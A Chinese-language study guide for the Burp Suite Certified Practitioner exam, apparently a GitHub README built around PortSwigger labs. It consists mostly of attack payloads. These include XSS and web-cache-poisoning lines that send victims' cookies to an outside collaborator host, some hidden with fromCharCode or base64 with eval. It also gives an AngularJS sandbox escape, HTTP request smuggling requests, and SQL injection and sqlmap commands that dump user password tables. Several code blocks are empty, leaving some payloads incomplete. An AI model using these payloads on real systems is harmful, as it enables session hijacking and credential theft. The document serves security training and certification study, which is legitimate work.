# Burp Suite 认证从业者考试学习 **[扫描 (SCANNING)](#scanning) - 枚举** [重点扫描](#focus-scanning) [扫描非标准实体](#scanning-non-standard-data-structures) **[立足点 (FOOTHOLD)](#foothold) - 阶段 1** [内容发现](#content-discovery) [DOM-XSS](#dom-based-xss) [XSS 跨站脚本攻击](#cross-site-scripting) [Web 缓存投毒](#web-cache-poison) [Host 头](#host-headers) [HTTP 请求走私](#http-request-smuggling) [暴力破解](#brute-force) [身份验证](#authentication) **[权限提升 (PRIVILEGE ESCALATION)](#privilege-escalation) - 阶段 2** [CSRF - 账户接管](#csrf-account-takeover) [密码重置](#password-reset) [SQLi - SQL 注入](#sql-injection) [JWT - JSON Web Tokens](#jwt) [原型污染](#prototype-pollution) [API 测试](#api-testing) [访问控制](#access-control) [GraphQL API 端点](#graphql-api) [CORS - 跨源资源共享](#cors) **[数据渗出 (DATA EXFILTRATION)](#data-exfiltration) - 阶段 3** [XXE - XML 实体与注入](#xxe-injections) [SSRF - 服务端请求伪造](#ssrf---server-side-request-forgery) [SSTI - 服务端模板注入](#ssti---server-side-template-injection) [SSPP - 服务端原型污染](#sspp---server-side-prototype-pollution) [LFI - 文件路径遍历](#file-path-traversal) [文件上传](#file-uploads) [反序列化](#deserialization) [OS 命令注入](#os-command-injection) **[附录 (APPENDIX)](#appendix)** [Python 脚本](#python-scripts) [Payloads](payloads/README.md) [字典](https://github.com/botesjuan/Burp-Suite-Certified-Practitioner-Exam-Study/tree/main/wordlists) [重点目标扫描](#focus-scanning) [方法](#approach) [额外培训内容](#extra-training-content) [我的 Burp 技巧](#burp-exam-results) [我的 Burp Suite 认证从业者证书。](https://portswigger.net/web-security/e/c/6e42f5738e5b9bf8?utm_source=office&utm_medium=email&utm_campaign=burp-prac-cert-pass-success) # 扫描 (Scanning) [重点扫描](#focus-scanning) [扫描非标准实体](#scanning-non-standard-data-structures) ## 重点扫描  ``` ``` ``` ``` [PortSwigger 实验：通过定向扫描快速发现漏洞](https://portswigger.net/web-security/essential-skills/using-burp-scanner-during-manual-testing/lab-discovering-vulnerabilities-quickly-with-targeted-scanning) ## 扫描非标准数据结构  ``` '"> ``` ``` ">

0 search results for 'fuzzer'

---

Search

```  ``` ``` ``` ```  [PortSwigger 实验：反射型 XSS 进入 JavaScript 字符串，单引号和反斜杠被转义](https://portswigger.net/web-security/cross-site-scripting/contexts/lab-javascript-string-single-quote-backslash-escaped) ``` ``` ``` ``` ### 反射字符串额外转义 ``` \'-alert(1)// fuzzer\';console.log(12345);// fuzzer\';alert(`Testing The backtick a typographical mark used mainly in computing`);// ``` ``` \';document.location=`https://OASTIFY.COM/?BackTicks=`+document.cookie;// ```  [PortSwigger 实验：反射型 XSS 进入 JavaScript 字符串，尖括号和双引号被 HTML 编码且单引号被转义](https://portswigger.net/web-security/cross-site-scripting/contexts/lab-javascript-string-angle-brackets-double-quotes-encoded-single-quotes-escaped) ### AngularJS 沙箱逃逸 [z3nsh3ll - YouTube 视频对这个无字符串的反射型 XSS AngularJS 沙箱逃逸给出了很好的解释](https://youtu.be/gKLHVT67sU0?si=tqQMb5Y6xLA-jgR4)    ``` 1&toString().constructor.prototype.charAt%3d[].join;[1]|orderBy:toString().constructor.fromCharCode(120,61,97,108,101,114,116,40,49,41)=1 ``` ``` x=fetch('https://m9w8haeauh0frftrtjdvexkyrpxgl69v.oastify.com/?z='+document.cookie) ``` ``` 120,61,102,101,116,99,104,40,39,104,116,116,112,115,58,47,47,103,112,57,111,49,56,57,51,106,97,107,49,100,122,101,55,117,116,118,50,114,107,118,114,48,105,54,57,117,122,105,111,46,111,97,115,116,105,102,121,46,99,111,109,47,63,122,61,39,43,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,41 ``` ``` import sys print('Python String to ASCII Converter!') if len(sys.argv) != 2: print("Usage: Python ascii_converter.py 'Payload_String'") sys.exit(1) input_string = sys.argv[1] ascii_values = [str(ord(char)) for char in input_string] output = ",".join(ascii_values) print(output) print('PortSwigger Expert Academy Labs!') ```  1. 该 exploit 使用 `toString()` 创建一个不使用引号的字符串。 2. 然后获取 String 原并为每个字符串覆盖 `charAt` 函数。 3. 这破坏了 AngularJS 沙箱，允许将数组传递给 `orderBy` 过滤器。 4. 通过再次使用 `toString()` 创建字符串和 String 构造函数属性来设置过滤器的参数。 5. 最后，使用 `fromCharCode` 方法通过将字符代码转换为 payload 示例 `x=alert(1)` 来生成我们的 payload。 6. `charAt` 函数已被覆盖，AngularJS 将允许此代码逃逸 **沙箱**。  ### XSS 模板字符串 ``` ${alert(document.cookie)} ```  #### 从上面扩展，他的 payload： ``` ${fetch(String.fromCharCode(0x68,0x74,0x74,0x70,0x73,0x3a,0x2f,0x2f,0x30,0x62,0x63,0x6f,0x31,0x68,0x62,0x62,0x32,0x66,0x72,0x75,0x61,0x39,0x6b,0x79,0x64,0x35,0x78,0x77,0x6c,0x31,0x71,0x37,0x77,0x79,0x32,0x70,0x71,0x6e,0x65,0x63,0x2e,0x6f,0x61,0x73,0x74,0x69,0x66,0x79,0x2e,0x63,0x6f,0x6d,0x3f,0x74,0x65,0x73,0x7a,0x74,0x3d) + document.cookie)} ```   [PortSwigger 实验：反射型 XSS 进入模板字符串，尖括号、单引号、双引号、反斜杠和反引号 Unicode 被转义](https://portswigger.net/web-security/cross-site-scripting/contexts/lab-javascript-template-literal-angle-brackets-single-double-quotes-backslash-backticks-escaped) ### 通过 JSON 注入 EVAL 的 XSS   ``` "-alert(window["document"]["cookie"])-" "-window["alert"](window["document"]["cookie"])-" "-self["alert"](self["document"]["cookie"])-" ``` [secjuice：使用 JavaScript 全局变量绕过 XSS 过滤器](https://www.secjuice.com/bypass-xss-filters-using-javascript-global-variables/) ``` fetch(`https://OASTIFY.COM/?jsonc=` + window["document"]["cookie"]) ``` ``` ZmV0Y2goYGh0dHBzOi8vNHo0YWdlMHlwYjV3b2I5cDYxeXBwdTEzdnUxbHBiZDAub2FzdGlmeS5jb20vP2pzb25jPWAgKyB3aW5kb3dbImRvY3VtZW50Il1bImNvb2tpZSJdKQ== ``` ``` "-eval(atob("ZmV0Y2goYGh0dHBzOi8vNHo0YWdlMHlwYjV3b2I5cDYxeXBwdTEzdnUxbHBiZDAub2FzdGlmeS5jb20vP2pzb25jPWAgKyB3aW5kb3dbImRvY3VtZW50Il1bImNvb2tpZSJdKQ=="))-" ``` + 使用 **eval()** 方法计算或执行参数。 + 使用 **atob()** 或 **btoa()** 是用于与 base64 格式字符串相互编码的函数。 + 如果 **eval()** 被拦截，则替代方案： + setTimeout("code") + setInterval("code) + setImmediate("code") + Function("code")()  ``` "-eval(atob("ZmV0Y2goYGh0dHBzOi8vNHo0YWdlMHlwYjV3b2I5cDYxeXBwdTEzdnUxbHBiZDAub2FzdGlmeS5jb20vP2pzb25jPWAgKyB3aW5kb3dbImRvY3VtZW50Il1bImNvb2tpZSJdKQ=="))-" ``` ``` ```  [PortSwigger 模拟考试 - 阶段 1 - 立足点](https://portswigger.net/web-security/certification/takepracticeexam/index.html) ### 存储型 XSS ``` ```  ``` ``` ``` ?productId=1&storeId="> ``` #### 存储型 XSS 博客文章 ``` ```  ``` ``` [PortSwigger 实验：利用跨站脚本窃取 cookies](https://portswigger.net/web-security/cross-site-scripting/exploiting/lab-stealing-cookies) #### 升级存储型 Self-XSS ``` Click Button ```  ``` https://challenge-1222.intigriti.io/blog/unique-guid-value-abc123?share=1 ``` [intigriti - Self-XSS 升级 - 12 月 22 日 XSS 挑战赛解答](https://youtu.be/FowbZ8IlU7o) ``` ``` ``` alert(document.getElementsByClassName("navbar-brand")[0].innerText) ``` ``` ``` [PortSwigger 实验：利用 DOM clobbering 启用 XSS](https://portswigger.net/web-security/dom-based/dom-clobbering/lab-dom-xss-exploiting-dom-clobbering) ### 存储型 DOM XSS  ``` <> ```  [PortSwigger 实验：存储型 DOM XSS](https://portswigger.net/web-security/cross-site-scripting/dom-based/lab-dom-xss-stored) ## Web 缓存投毒 [Unkeyed header](#unkeyed-header) [Unkeyed Utm_content](#unkeyed-utm_content) [伪装 utm_content](#cloaking-utm_content) [投毒歧义请求](#poison-ambiguous-request) [缓存投毒多个 headers](#cache-poison-multiple-headers) ### Unkeyed header  ``` X-Forwarded-Host: EXPLOIT.net X-Host: EXPLOIT.net ```  ``` /resources/js/tracking.js ```  ``` document.location='https://OASTIFY.COM/?cookies='+document.cookie; ```  [PortSwigger 实验：使用 unkeyed header 进行 Web 缓存投毒](https://portswigger.net/web-security/web-cache-poisoning/exploiting-design-flaws/lab-web-cache-poisoning-with-an-unkeyed-header) [YouTube：使用 unkeyed header 进行 Web 缓存投毒 - cookie 窃取器](https://youtu.be/eNmF8fq-ur8) [Param Miner 扩展以识别 Web 缓存漏洞](https://portswigger.net/bappstore/17d2949a985c4b7ca092728dba871943) ### Unkeyed utm_content  ``` GET /?utm_content='/> ```  [PortSwigger 实验：通过 unkeyed query 参数进行 Web 缓存投毒](https://portswigger.net/web-security/web-cache-poisoning/exploiting-implementation-flaws/lab-web-cache-poisoning-unkeyed-param) ### 伪装 utm_content ``` GET /js/geolocate.js?callback=setCountryCookie&utm_content=fuzzer;callback=EVILFunction ```  ``` GET /js/geolocate.js?callback=setCountryCookie&utm_content=fuzzer;callback=document.location='https://OASTIFY.COM?nuts='%2bdocument.cookie%3b HTTP/2 ``` ``` GET/js/geolocate.js?callback=setCountryCookie&utm_content=fuzzer;callback=document.location='https://OASTIFY.COM?nuts='+document.cookie; HTTP/2 ``` [PortSwigger 实验：参数伪装](https://portswigger.net/web-security/web-cache-poisoning/exploiting-implementation-flaws/lab-web-cache-poisoning-param-cloaking) ### 投毒歧义请求 ``` Host: TARGET.net Host: exploit.net ``` ``` document.location='https://OASTIFY.COM/?CacheCookies='+document.cookie; ```  [PortSwigger 实验：通过歧义请求进行 Web 缓存投毒](https://portswigger.net/web-security/host-header/exploiting/lab-host-header-web-cache-poisoning-via-ambiguous-requests) ### 缓存投毒多个 headers ``` GET /resources/js/tracking.js?cb=123 HTTP/2 Host: TARGET.net X-Forwarded-Host: EXPLOIT.net X-Forwarded-Scheme: nothttps ```  ``` document.location='https://OASTIFY.COM/?poisoncache='+document.cookie; ``` [PortSwigger 实验：使用多个 headers 进行 Web 缓存投毒](https://portswigger.net/web-security/web-cache-poisoning/exploiting-design-flaws/lab-web-cache-poisoning-with-multiple-headers) ### 重复参数 Fat Poison  ``` GET /js/geolocate.js?callback=setCountryCookie&callback=FUZZERFunction; HTTP/2 ```  [PortSwigger 实验：通过 fat GET 请求进行 Web 缓存投毒](https://portswigger.net/web-security/web-cache-poisoning/exploiting-implementation-flaws/lab-web-cache-poisoning-fat-get) ## Host Headers [欺骗 IP 地址](#spoof-ip-address) [HOST 连接状态](#host-connection-state) [基于 Host 路由的 SSRF](#host-routing-based-ssrf) [通过有缺陷的 Host 请求解析进行 SSRF](#absolute-get-url--host-ssrf) ### 欺骗 IP 地址 ``` X-Forwarded-Host: EXPLOIT.net X-Host: EXPLOIT.net X-Forwarded-Server: EXPLOIT.net ``` * 在密码重置时伪造 host header，使用 `Host:` 或 `X-Forwarded-Host:`，如果您收到错误 `Invalid hostname`，请尝试使用以下主机名：`xxx.oastify.com?TARGET.net` 合法目标 URL 不带斜杠。  [PortSwigger 实验：通过中间件进行密码重置投毒](https://portswigger.net/web-security/authentication/other-mechanisms/lab-password-reset-poisoning-via-middleware) ### HOST 连接状态 ``` GET / HTTP/1.1 Host: TARGET.net Cookie: session=ValueOfSessionCookie Content-Length: 48 Content-Type: text/plain;charset=UTF-8 Connection: keep-alive ``` ``` POST /admin/delete HTTP/1.1 Host: localhost Cookie: _lab=YOUR-LAB-COOKIE; session=YOUR-SESSION-COOKIE Content-Type: x-www-form-urlencoded Content-Length: 53 csrf=TheCSRFTokenValue&username=carlos ```  [PortSwigger 实验：通过连接状态攻击绕过 Host 验证](https://portswigger.net/web-security/host-header/exploiting/lab-host-header-host-validation-bypass-via-connection-state-attack) ## HTTP 请求走私 [TE.CL dualchunk - Transfer-encoding 混淆](#tecl-dualchunk---transfer-encoding-obfuscated) [TE.CL multiCase - Admin 被拦截](#tecl-multiCase---admin-blocked) [CL.TE multiCase - Admin 被拦截](#clte-multicase---admin-blocked) [CL.TE multiCase - Content-Length Cookie 窃取](#clte-multicase---content-length) [CL.TE multiCase - User-Agent Cookie 窃取](#clte-multicase---user-agent-cookie-stealer) [HTTP/2 走私 - CRLF 注入 Cookie 窃取](#http2-smuggling-via-crlf-injection) [HTTP/2 TE - Admin Cookie 窃取](#http2-te-desync-v10a-h2path) ### TE.CL dualchunk - Transfer-encoding 混淆 ``` Transfer-Encoding: xchunked Transfer-Encoding : chunked Transfer-Encoding: chunked Transfer-Encoding: x Transfer-Encoding:[tab]chunked [space]Transfer-Encoding: chunked X: X[\n]Transfer-Encoding: chunked Transfer-Encoding : chunked Transfer-encoding: identity Transfer-encoding: cow ``` ``` POST / HTTP/1.1 Host: TARGET.net Content-Type: application/x-www-form-urlencoded Content-length: 4 Transfer-Encoding: chunked Transfer-encoding: identity e6 GET /post?postId=4 HTTP/1.1 User-Agent: a"/> Content-Type: application/x-www-form-urlencoded Content-Length: 15 x=1 0\r\n \r\n ```  [PortSwigger 实验：HTTP 请求走私，混淆 Transfer-Encoding (TE) header](https://portswigger.net/web-security/request-smuggling/lab-obfuscating-te-header) ### TE.CL multiCase - Admin 被拦截 ``` POST / HTTP/1.1 Host: TARGET.net Content-Type: application/x-www-form-urlencoded Content-length: 4 Transfer-Encoding: chunked 71 POST /admin HTTP/1.1 Host: localhost Content-Type: application/x-www-form-urlencoded Content-Length: 15 x=1 0 ```  [PortSwigger 实验：利用 HTTP 请求走私绕过前端安全控制，TE.CL 漏洞](https://portswigger.net/web-security/request-smuggling/exploiting/lab-bypass-front-end-controls-te-cl) ### CL.TE multiCase - Admin 被拦截 ``` POST / HTTP/1.1 Host: TARGET.net Cookie: session=waIS6yM79uaaNUO4MnmxejP2i6sZWo2E Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Content-Type: application/x-www-form-urlencoded Content-Length: 116 tRANSFER-ENCODING: chunked 0 GET /admin HTTP/1.1 Host: localhost Content-Type: application/x-www-form-urlencoded Content-Length: 10 x= ```  [PortSwigger 实验：利用 HTTP 请求走私绕过前端安全控制，CL.TE 漏洞](https://portswigger.net/web-security/request-smuggling/exploiting/lab-bypass-front-end-controls-cl-te) ### CL.TE multiCase - Content-Length ``` POST / HTTP/1.1 Host: TARGET.net Content-Type: application/x-www-form-urlencoded Content-Length: 242 Transfer-Encoding: chunked 0 POST /post/comment HTTP/1.1 Content-Type: application/x-www-form-urlencoded Content-Length: 798 Cookie: session=HackerCurrentCookieValue csrf=ValidCSRFCookieValue&postId=8&name=c&email=c%40c.c&website=&comment=c ```   [PortSwigger 实验：利用 HTTP 请求走私捕获其他用户的请求](https://portswigger.net/web-security/request-smuggling/exploiting/lab-capture-other-users-requests) ### CL.TE multiCase - User-Agent Cookie 窃取 ``` "/> ``` ``` a"/> ``` ``` POST / HTTP/1.1 Host: TARGET.net Content-Length: 237 Content-Type: application/x-www-form-urlencoded Transfer-Encoding: chunked 0 GET /post?postId=4 HTTP/1.1 User-Agent: a"/> Content-Type: application/x-www-form-urlencoded Content-Length: 5 x=1 ```   [PortSwigger 实验：利用 HTTP 请求走私传递反射型 XSS](https://portswigger.net/web-security/request-smuggling/exploiting/lab-deliver-reflected-xss) ### 通过 CRLF 注入进行 HTTP/2 走私   ``` 0 POST / HTTP/1.1 Host: YOUR-LAB-ID.web-security-academy.net Cookie: session=HACKER-SESSION-COOKIE Content-Length: 800 search=nutty ```  [PortSwigger 实验：通过 CRLF 注入进行 HTTP/2 请求走私](https://portswigger.net/web-security/request-smuggling/advanced/lab-request-smuggling-h2-request-smuggling-via-crlf-injection) [Youtube 演示通过 CRLF 注入进行 HTTP/2 请求走私](https://youtu.be/E-bnCGzl7Rk) ### HTTP/2 TE desync v10a h2path  ``` POST /x HTTP/2 Host: TARGET.net Transfer-Encoding: chunked 0 GET /x HTTP/1.1 Host: TARGET.web-security-academy.net\r\n \r\n ```  ``` GET /admin HTTP/2 Host: TARGET.web-security-academy.net Cookie: session=VictimAdminSessionCookieValue Cache-Control: max-age=0 Sec-Ch-Ua: "Chromium";v="109", "Not_A Brand";v="99" Sec-Ch-Ua-Mobile: ?0 Sec-Ch-Ua-Platform: "Linux" ```  [PortSwigger 实验：通过 H2.TE 请求走私进行响应队列投毒](https://portswigger.net/web-security/request-smuggling/advanced/response-queue-poisoning/lab-request-smuggling-h2-response-queue-poisoning-via-te-request-smuggling) ## 暴力破解 [Stay-Logged-in](#stay-logged-in) [Stay-logged-in 离线破解](#stay-logged-in-offline-crack) [暴力破解受保护的登录](#brute-force-protected-login) [细微差异的无效登录](#subtly-invalid-login) ### Stay-Logged-in  1. 以当前用户身份登出。 2. 将最近的 GET /my-account 请求发送到 Burp Intruder。 3. 选择 cookie: ```stay-logged-in``` 作为注入位置。 4. 哈希：```MD5``` 5. 添加前缀：```carlos:``` 6. 编码：```Base64-encode``` 7. 在设置选项卡下添加 **GREP**，以检查响应中的字符串 ```Update email```，指示成功登录的攻击。  [PortSwigger 实验：暴力破解 stay-logged-in cookie](https://portswigger.net/web-security/authentication/other-mechanisms/lab-brute-forcing-a-stay-logged-in-cookie) ### Stay-logged-in 离线破解 ``` ```  [PortSwigger 实验：离线密码破解](https://portswigger.net/web-security/authentication/other-mechanisms/lab-offline-password-cracking) ### 暴力破解受保护的登录 [Burp 实验用户名、密码和目录模糊测试字典](https://github.com/botesjuan/Burp-Suite-Certified-Practitioner-Exam-Study/tree/main/wordlists) ``` X-Forwarded-For: 12.13.14.15 ```  [PortSwigger 实验：通过响应时间枚举用户名](https://portswigger.net/web-security/authentication/password-based/lab-username-enumeration-via-response-timing) ### 细微差异的无效登录   [PortSwigger 实验：通过细微的响应差异枚举用户名](https://portswigger.net/web-security/authentication/password-based/lab-username-enumeration-via-subtly-different-responses) [PortSwigger 实验：通过不同的响应枚举用户名](https://portswigger.net/web-security/authentication/password-based/lab-username-enumeration-via-different-responses) ## 身份验证 [账户注册](#account-registration) [Auth Token 绕过宏](#auth-token-bypass-macro) ### 账户注册  ``` very-long-strings-so-very-long-string-so-very-long-string-so-very-long-string-so-very-long-string-so-very-long-string-so-very-long-string-so-very-long-string-so-very-long-string-so-very-long-string-so-very-long-string-so-very-long-strings@dontwannacry.com.exploit-0afe007b03a34169c10b8fc501510091.exploit-server.net ```  [PortSwigger 实验：对异常输入的处理不一致](https://portswigger.net/web-security/logic-flaws/examples/lab-logic-flaws-inconsistent-handling-of-exceptional-input) ### Auth Token 绕过宏 1. 打开代理设置并在项目选项下选择 **sessions**。 2. 向下滚动到 ```Macros```，并添加新的宏。 3. 从列表中选择 **request** 以用于要使用的值。 4. 点击 ```Configure item``` 并添加自定义参数位置以提取。 5. 点击 **OK** 返回项目选项下的 Sessions。 6. 添加一个 Session handling **rule**，编辑对话框随即打开。 7. 在对话框中，转到 "Scope" 选项卡。 8. 在会话处理规则编辑器的范围内，**勾选** Target、truder 和 Repeater。 9. 仍在 "URL Scope" 下，选择 ```Include all URLs```。 10. 关闭设置。  [PortSwigger 实验：无限金钱逻辑缺陷 - 展示如何创建 Burp 宏](https://portswigger.net/web-security/logic-flaws/examples/lab-logic-flaws-infinite-money) # 权限提升 ## CSRF 账户接管 [OAuth](#oauth) [Referer 验证 CSRF](#referer-validation-csrf) [Referer Header 存在](#referer-header-present) [LastSearchTerm](#lastsearchterm) [CSRF 在 cookie 中重复](#csrf-duplicated-in-cookie) [CSRF Token 存在](#csrf-token-present) [Is Logged In](#is-logged-in) [CSRF 无防御](#csrf-no-defences) [SameSite Strict 绕过](#samesite-strict-bypass) [SameSite Lax 绕过](#samesite-lax-bypass) ### OAuth  ``` ``` [PortSwigger 实验：强制 OAuth 配置文件链接](https://portswigger.net/web-security/oauth/lab-oauth-forced-oauth-profile-linking) ### Referer 验证 CSRF  ``` Referrer-Policy: unsafe-url ```  ```

``` [PortSwigger 实验：具有损坏的 Referer 验证的 CSRF](https://portswigger.net/web-security/csrf/bypassing-referer-based-defenses/lab-referer-validation-broken) ### Referer Header 存在 ```

```  [PortSwigger 实验：Referer 验证依赖于 header 是否存在的 CSRF](https://portswigger.net/web-security/csrf/bypassing-referer-based-defenses/lab-referer-validation-depends-on-header-being-present) ### LastSearchTerm  ``` /?search=test%0d%0aSet-Cookie:%20csrfKey=CurrentUserCSRFKEY%3b%20SameSite=None ``` ``` ```  ```

``` [PortSwigger 实验：Token 绑定到非会话 cookie 的 CSRF](https://portswigger.net/web-security/csrf/bypassing-token-validation/lab-token-tied-to-non-session-cookie) ### CSRF 在 cookie 中重复  ```

```  [PortSwigger 实验：Token 在 cookie 中重复的 CSRF](https://portswigger.net/web-security/csrf/bypassing-token-validation/lab-token-duplicated-in-cookie) ### CSRF Token 存在 ```

```  [PortSwigger 实验：Token 验证依赖于 Token 是否存在的 CSRF](https://portswigger.net/web-security/csrf/bypassing-token-validation/lab-token-validation-depends-on-token-being-present) ### Is Logged In ``` POST /refreshpassword HTTP/1.1 Host: TARGET.net Cookie: session=%7b%22username%22%3a%22carlos%22%2c%22isloggedin%22%3atrue%7d--MCwCFAI9forAezNBAK%2fWxko91dgAiQd1AhQMZgWruKy%2fs0DZ0XW0wkyATeU7aA%3d%3d Content-Length: 60 Cache-Control: max-age=0 Sec-Ch-Ua: "Chromium";v="109", "Not_A Brand";v="99" Sec-Ch-Ua-Mobile: ?0 Sec-Ch-Ua-Platform: "Linux" Upgrade-Insecure-Requests: 1 Origin: https://TARGET.net Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*; X-Forwarded-Host: EXPLOIT.net X-Host: EXPLOIT.net X-Forwarded-Server: EXPLOIT.net Referer: https://TARGET.net/refreshpassword Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Connection: close csrf=TOKEN&username=administrator ```  ### CSRF 无防御  [PortSwigger 实验：无防御的 CSRF 漏洞](https://portswigger.net/web-security/csrf/lab-no-defenses) ### SameSite Strict 绕过 ``` ``` [cms 反射型 xss samesite 绕过](images/cms-reflected-xss-samesite-bypass.png) ``` https://cms-TARGET.net/login?username=%3Cscript%3Ealert%28%27reflectXSS%27%29%3C%2Fscript%3E&password=pass ``` ``` ``` ``` ```  [PortSwigger 实验：通过兄弟域绕过 SameSite Strict](https://portswigger.net/web-security/csrf/bypassing-samesite-restrictions/lab-samesite-strict-bypass-via-sibling-domain) ### SameSite Lax 绕过 ```

Click anywhere on the page

``` [PortSwigger 实验：通过 cookie 刷新绕过 SameSite Lax](https://portswigger.net/web-security/csrf/bypassing-samesite-restrictions/lab-samesite-strict-bypass-via-cookie-refresh) ## 密码重置 [重置密码逻辑损坏](#refresh-password-broken-logic) [当前密码](#current-password) [时间敏感密码 Tokenz](#time-sensitive-password-tokenz) ### 重置密码逻辑损坏   [PortSwigger 实验：密码重置逻辑损坏](https://portswigger.net/web-security/authentication/other-mechanisms/lab-password-reset-broken-logic) ### 当前密码  [PortSwigger 实验：双用端点上的弱隔离](https://portswigger.net/web-security/logic-flaws/examples/lab-logic-flaws-weak-isolation-on-dual-use-endpoint) ### 时间敏感密码 Tokenz  ## SQL 注入 [盲注时间延迟](#blind-time-delay) [盲注 SQLi](#blind-sqli) [盲注 SQLi 无提示](#blind-sqli-no-indication) [盲注 SQLi 条件响应](#blind-sqli-conditional-response) [Oracle](#oracle) [SQLMAP](#sqlmap) [非 Oracle 手动 SQLi](#non-oracle-manual-sqli) [可视化的基于错误的 SQLi](#visual-error-based-sqli) [HackTheBox CPTS SQLi 基础知识](https://github.com/botesjuan/cpts-quick-references/blob/main/module/SQL%20Injection%20Fundamentals.md) [SQL 注入备忘单示例](https://portswigger.net/web-security/sql-injection/cheat-sheet)  ### 盲注时间延迟 ``` ;SELECT CASE WHEN (1=1) THEN pg_sleep(7) ELSE pg_sleep(0) END-- ``` ``` '%3BSELECT+CASE+WHEN+(1=1)+THEN+pg_sleep(7)+ELSE+pg_sleep(0)+END-- ``` ``` ;SELECT+CASE+WHEN+(username='administrator'+AND+LENGTH(password)>1)+THEN+pg_sleep(10)+ELSE+pg_sleep(0)+END+FROM+users-- ```  ``` ;SELECT+CASE+WHEN+(username='administrator'+AND+SUBSTRING(password,§1§,1)='§a§')+THEN+pg_sleep(10)+ELSE+pg_sleep(0)+END+FROM+users-- ```  [PortSwigger 实验：具有时间延迟和信息检索的盲注 SQL 注入](https://portswigger.net/web-security/sql-injection/blind/lab-time-delays-info-retrieval) #### 模拟考试 PostgreSQL 时间延迟 ``` %3BSELECT+pg_sleep(7)-- ```  ``` ;SELECT+CASE+WHEN+(username='administrator'+AND+SUBSTRING(password,§1§,1)='§a§')+THEN+pg_sleep(7)+ELSE+pg_sleep(0)+END+FROM+users-- ``` ### 盲注 SQLi ``` TrackingId=xxx'+UNION+SELECT+EXTRACTVALUE(xmltype('<%3fxml+version%3d"1.0"+encoding%3d"UTF-8"%3f>+%25remote%3b]>'),'/l')+FROM+dual-- ```  [PortSwigger 实验：带外数据渗出的盲注 SQL 注入](https://portswigger.net/web-security/sql-injection/blind/lab-out-of-band-data-exfiltration) ### 盲注 SQLi 无提示 ``` TrackingId=xxx'+UNION+SELECT+EXTRACTVALUE(xmltype('<%3fxml+version%3d"1.0"+encoding%3d"UTF-8"%3f>+%25remote%3b]>'),'/l')+FROM+dual-- ```  ``` '||(select extractvalue(xmltype('%fuzz;]>'),'/l') from dual)||' ``` [OAST - 带外应用安全测试](https://portswigger.net/burp/application-security-testing/oast) [PortSwigger 实验：带外交互的盲注 SQL 注入](https://portswigger.net/web-security/sql-injection/blind/lab-out-of-band) ### 盲注 SQLi 条件响应 ``` ' AND '1'='1 ``` ``` ' AND '1'='2 ``` ``` ' AND (SELECT 'a' FROM users WHERE username='administrator' AND LENGTH(password)>1)='a ``` ``` ' AND (SELECT SUBSTRING(password,2,1) FROM users WHERE username='administrator')='a ```   [PortSwigger 实验：具有条件响应的盲注 SQL 注入](https://portswigger.net/web-security/sql-injection/blind/lab-conditional-responses) ### Oracle ``` '+UNION+SELECT+table_name,NULL+FROM+all_tables-- ``` ``` '+UNION+SELECT+column_name,NULL+FROM+all_tab_columns+WHERE+table_name='USERS_XXX'-- ``` ``` '+UNION+SELECT+USERNAME_XXX,+PASSWORD_XXX+FROM+USERS_XXX-- ``` [PortSwigger 实验：SQL 注入攻击，列出 Oracle 上的数据库内容](https://portswigger.net/web-security/sql-injection/examining-the-database/lab-listing-database-contents-oracle) ### SQLMAP [PortSwigger 论坛主题 - SQLMAP](https://forum.portswigger.net/thread/stage-2-of-practice-exam-with-sqlmap-1-7-2-2078f927) ``` sqlmap -u 'https://TARGET.net/filtered_search?SearchTerm=x&sort-by=DATE&writer=' \ -H 'authority: 0afd007004402dacc1e7220100750051.web-security-academy.net' \ -H 'accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7' \ -H 'accept-language: en-US,en;q=0.9' \ -H 'cookie: _lab=YesYesYesYes; session=YesYesYesYes' \ -H 'referer: https://TARGET.net/filtered_search?SearchTerm=x&sort-by=DATE&writer=' \ -H 'sec-ch-ua: "Chromium";v="111", "Not(A:Brand";v="8"' \ -H 'sec-ch-ua-mobile: ?0' \ -H 'sec-ch-ua-platform: "Linux"' \ -H 'sec-fetch-dest: document' \ -H 'sec-fetch-mode: navigate' \ -H 'sec-fetch-site: same-origin' \ -H 'sec-fetch-user: ?1' \ -H 'upgrade-insecure-requests: 1' \ -H 'user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.5563.65 Safari/537.36' \ -p 'sort-by' -batch --flush-session --dbms postgresql --technique E --level 5 ```  ``` sqlmap -v -u 'https://TARGET.NET/search?term=x&organizeby=DATE&journalist=&cachebust=1656138093.57' -p "term" --batch --cookie="_lab=YESYESYESYES; session=YESYESYESYES" --random-agent --level=2 --risk=2 ```  [SQLMAP 帮助用法](https://github.com/sqlmapproject/sqlmap/wiki/Usage) ``` -p 'sort-by' -batch --dbms postgresql --technique E --level 5 --dbs ``` ``` -p 'sort-by' -batch --dbms postgresql --technique E --level 5 -D public --tables ``` ``` -p 'sort-by' -batch --dbms postgresql --technique E --level 5 -D public -T users --dump ``` ### 非 Oracle 手动 SQLi ``` '+UNION+SELECT+NULL,NULL-- ``` ``` '+UNION+SELECT+'fuzzer',NULL-- ``` ``` '+UNION+SELECT+table_name,+NULL+FROM+information_schema.tables-- ``` ``` '+UNION+SELECT+username,+password+FROM+users-- ``` ``` '+UNION+SELECT+column_name,+NULL+FROM+information_schema.columns+WHERE+table_name='users_XXXX'-- ``` ``` '+UNION+SELECT+username_XXXX,+password_XXXX+FROM+users_XXXX-- ``` ``` '+UNION+SELECT+NULL,username||'~'||password+FROM+users-- ```  [PortSwigger 实验：SQL 注入攻击，列出非 Oracle 数据库上的数据库内容](https://portswigger.net/web-security/sql-injection/examining-the-database/lab-listing-database-contents-non-oracle) ### 可视化的基于错误的 SQLi  ``` TrackingId=x'||CAST((SELECT username FROM users LIMIT 1) AS int)--; TrackingId=x'||CAST((SELECT password FROM users LIMIT 1) AS int)--; ```  [PortSwigger 实验：可见的基于错误的 SQL 注入](https://portswigger.net/web-security/sql-injection/blind/lab-sql-injection-visible-error-based) ## JWT 